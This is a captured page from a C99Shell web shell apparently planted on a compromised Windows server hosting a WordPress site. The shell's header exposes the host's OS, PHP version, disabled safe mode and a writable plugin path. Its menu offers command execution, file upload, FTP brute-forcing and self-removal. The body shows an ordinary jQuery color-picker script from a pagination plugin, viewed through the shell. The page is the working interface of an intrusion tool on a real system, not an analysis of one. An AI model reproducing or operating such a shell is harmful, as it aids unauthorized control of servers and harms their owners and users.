!C99Shell v. 1.0 pre-release build #13!

Software: Apache. PHP/5.5.15 

uname -a: Windows NT SVR-DMZ 6.1 build 7600 (Windows Server 2008 R2 Enterprise Edition) i586 

SYSTEM 

Safe-mode: OFF (not secure)

C:\cumbre\cumbreclima\wp-content\plugins\wp-pagenavi-style\js\   drwxrwxrwx
Free 3.26 GB of 39.52 GB (8.25%)
Detected drives: [ a ] [ c ] [ d ] [ e ] [ f ]
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     script.js (1.33 KB)      -rw-rw-rw-
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
$(document).ready(function(){
	var original_val=$('#wp_pn_style_selection').attr('value');
		var val1=$('#wp_pn_style_select_box').attr('value');
		$('#wp_pn_style_IMG_preview').removeClass();
		$('#wp_pn_style_IMG_preview').addClass(val1);			
	if(original_val=='custom')
	{
		$('#wp_pn_custom_template_style').hide();
		$('#wp_pn_style_custom_style_box').show();

	}
	else
	{
			$('#wp_pn_style_custom_style_box').hide();
			$('#wp_pn_custom_template_style').show();
	}
	$('#wp_pn_style_selection').change(function(){
	var val1=$('#wp_pn_style_selection').attr('value');
			if(val1=='custom')
			{
				$('#wp_pn_style_custom_style_box').show();
				$('#wp_pn_custom_template_style').hide();
			}
			else
			{
				$('#wp_pn_style_custom_style_box').hide();
				$('#wp_pn_custom_template_style').show();
			}
	
	});
	
	$('#wp_pn_style_select_box').change(function(){
		var val1=$('#wp_pn_style_select_box').attr('value');
		$('#wp_pn_style_IMG_preview').removeClass();
		$('#wp_pn_style_IMG_preview').addClass(val1);			
	});
	$('.wp_pn_color_picker').ColorPicker({
		onSubmit: function(hsb, hex, rgb, el) {
			$(el).val(hex);
			$(el).ColorPickerHide();
		},
		onBeforeShow: function () {
			$(this).ColorPickerSetColor(this.value);
		}
	})
	.bind('keyup', function(){
		$(this).ColorPickerSetColor(this.value);
	});
});

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 1.0 pre-release build #13 powered by Captain Crunch Security Team | http://ccteam.ru | Generation time: 0.0156 ]--